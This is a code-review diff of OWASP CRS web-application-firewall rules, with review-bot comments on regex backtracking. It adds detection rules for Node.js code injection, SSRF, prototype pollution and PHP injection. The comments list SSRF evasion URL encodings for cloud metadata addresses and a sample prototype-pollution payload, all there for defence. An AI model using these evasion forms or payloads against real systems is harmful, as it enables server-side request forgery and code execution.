(?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\s\v]|/\*.*\*/|(?:#|//).*)*\(.*\)" \ "id:933161,\ phase:2,\ block,\ @@ -639,11 +642,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # @@ -682,11 +684,10 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # [ PHP Closing Tag Found ] 
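Review bot: The regenerated 933161 expression keeps the suffix `(?:[\s\v]|/\*.*\*/|(?:#|//).*)*\(.*\)` from the old rule, and a starred group containing the greedy `/\*.*\*/` is ambiguous: a run of `/**/` tokens can be split between iterations in exponentially many ways, and when no `\(.*\)` follows the engine tries them all before failing. ModSecurity's PCRE match limit caps the cost, but the rule then silently stops matching rather than detecting. Since the expression is now built from `933161.ra`, this is the moment to replace the block-comment alternative with an unambiguous form such as `/\*[^*]*\*+(?:[^/*][^*]*\*+)*/` and rerun the regression tests. Whether `t:replaceComments` already strips comments before this regex is decided in the action list, which lies outside the hunk.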
@@ -712,17 +713,51 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Functions: Variable Function Prevent Bypass ] +# +# This rule is a stricter sibling of 933210. +# Unlike 933210, this rule will also match "this is a 'dog' (not a cat)", because the semi-colon at the end of the string is optional. +# This is useful for PHP evals where the semi-colon is already hardcoded: +# +# +# Any potential function calls not at the end of a string will require a semi-colon to form valid PHP, which is automatically covered by 933210. +# +# Regular expression generated from regex-assembly/933211.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933211 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\)(?:;|$)?" 
\
+ "id:933211,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\
+ msg:'PHP Injection Attack: Variable Function Call Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-php',\
+ tag:'platform-multi',\
+ tag:'attack-injection-php',\
+ tag:'paranoia-level/3',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
-# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
new file mode 100644
index 0000000000..84a619805d
--- /dev/null
+++ b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
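Review bot: `\)(?:;|$)?` at the end of the new 933211 expression is equivalent to `\);?`: the group is optional, so the `$` alternative never decides whether the rule matches and only affects what `TX.0` captures. Writing it as `;?` in `933211.ra` expresses what the comment says (the semicolon is optional) without implying an end-of-string condition that does not exist. The comment block also announces an example after `This is useful for PHP evals where the semi-colon is already hardcoded:` but the two lines that follow are empty, which looks like the example was lost on the way in (possibly a `<?php …` fragment stripped as markup); please restore it or drop the colon. As with 933210, `t:removeWhitespace` makes the `\s\v` members of the character class unreachable.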
@@ -0,0 +1,366 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.0.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ NodeJS Insecure unserialization / generic RCE signatures ] +# +# Libraries performing insecure unserialization: +# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) +# - funcster: __js_function +# +# See: +# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ +# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ +# +# Some generic snippets used: +# - function() { +# - new Function( +# - eval( +# - String.fromCharCode( +# +# Last two are used by nodejsshell.py, +# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py +# +# As base64 is sometimes (but not always) used to encode serialized values, +# use multiMatch and t:base64decode. +# +# Regular expression generated from regex-assembly/934100.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934100 +# +# Stricter sibling: 934101 +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\v]+Function[\s\v]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\v]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \ + "id:934100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,\ + msg:'Node.js Injection Attack 
1/2',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# -=[ SSRF Attacks ]=- +# +# We provide only partial protection to SSRF. DNS Rebinding attacks needs +# to be handled at application level, and even those might be difficult to catch. +# +# PL1 rules are based on common attacks on cloud providers, based on well-known URLs. +# +# -=[ References ]=- +# https://highon.coffee/blog/ssrf-cheat-sheet/ +# https://cwe.mitre.org/data/definitions/918.html +# https://capec.mitre.org/data/definitions/664.html) +# +# Preventing: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile ssrf.data" \ + "id:934110,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: Cloud provider metadata URL in Parameter',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# JavaScript prototype pollution injection attempts +# +# Example from https://hackerone.com/reports/869574 critical +# vulnerability in the TypeORM library: +# 
{"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} +# +# Test cases are based on this list of payloads: +# https://github.com/BlackFan/client-side-prototype-pollution/blob/master/README.md +# +# See also: https://cwe.mitre.org/data/definitions/1321.html +# +# Note: only server-based (not DOM-based) attacks are covered here. +# Stricter sibling: 934131 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__proto__|constructor\s*(?:\.|\[)\s*prototype)" \ + "id:934130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,\ + msg:'JavaScript Prototype Pollution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1/180/77',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Ruby generic RCE signatures ] +# +# Detects Ruby-based injection attacks. +# Example: Process.spawn("id") +# +# Regular expression generated from regex-assembly/934150.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934150 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx Process[\s\v]*\.[\s\v]*spawn[\s\v]*\(" \ + "id:934150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Ruby Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-ruby',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ NodeJS DoS signatures ] +# +# NodeJS runs in a single thread, so any evaluated payloads that block execution can cause an easy DoS. +# This rule attempts to block e.g. while(true). +# +# Regular expression generated from regex-assembly/934160.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934160 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx while[\s\v]*\([\s\v\(]*(?:!+(?:false|null|undefined|NaN|[\+\-]?0|\"{2}|'{2}|`{2})|(?:!!)*(?:(?:t(?:rue|his)|[\+\-]?(?:Infinity|[1-9][0-9]*)|new [A-Za-z][0-9A-Z_a-z]*|window|String|(?:Boolea|Functio)n|Object|Array)\b|\{.*\}|\[.*\]|\"[^\"]+\"|'[^']+'|`[^`]+`)).*\)" \ + "id:934160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:replaceComments,\ + msg:'Node.js DoS attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP data: scheme ] +# +# PHP supports the `data:` scheme without using `//` before the content-type. +# +# Regular expression generated from regex-assembly/934170.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934170 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^data:(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*" \ + "id:934170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP data scheme attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL 
"@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# This rule is a stricter sibling of 934100. +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:close|exists|fork|(?:ope|spaw)n|re(?:ad|quire)|w(?:atch|rite))[\s\v]*\(" \ + "id:934101,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\ + msg:'Node.js Injection Attack 2/2',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ SSRF Attacks ]=- +# +# PL2 rules adds SSRF capture for common evasion techniques. 
+# +# We add captures for these evasion techniques: (see source in util/regexp-assemble/data/regexp-934120.data) +# http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) +# http://2852039166/ Dotless decimal - \d{10} +# http://7147006462/ Dotless decimal with overflow - \d{10} +# http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal - (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} +# http://0xA9FEA9FE/ Dotless hexadecimal - 0x[a-f0-9]{8} +# http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow - 0x[a-f0-9]{16} +# http://0251.0376.0251.0376/ Dotted octal - Covered by the same below +# http://0251.00376.000251.0000376/ Dotted octal with padding - (?:0{1,4}\d{3}\.){3}0{1,4}\d{3}) +# http://169.254.43518/ - (?:\d{1,3}\.){2}\.\d{5} +# http://169.16689662/ - \d{1,3}\.\d{8} +# http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below) +# http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded - (?:(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,7}:|(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|(?:[0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}|(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:(?:(?::[0-9a-fA-F]{1,4}){1,6})|:(?:(?::[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)|(?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 - ((?:[0-9a-fA-F]{1,4}:){6}(?:(25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[::] +# http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) +# 
http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) +# http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) +# http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) +# http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ +# http://google.com:80+&@google.com:80#+@127.88.23.245:22/ +# +# Regular expression generated from regex-assembly/934120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934120 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)((?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\--\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\v]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\--\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\xe2(?:\x91[\xa0-\xbf]|\x92[\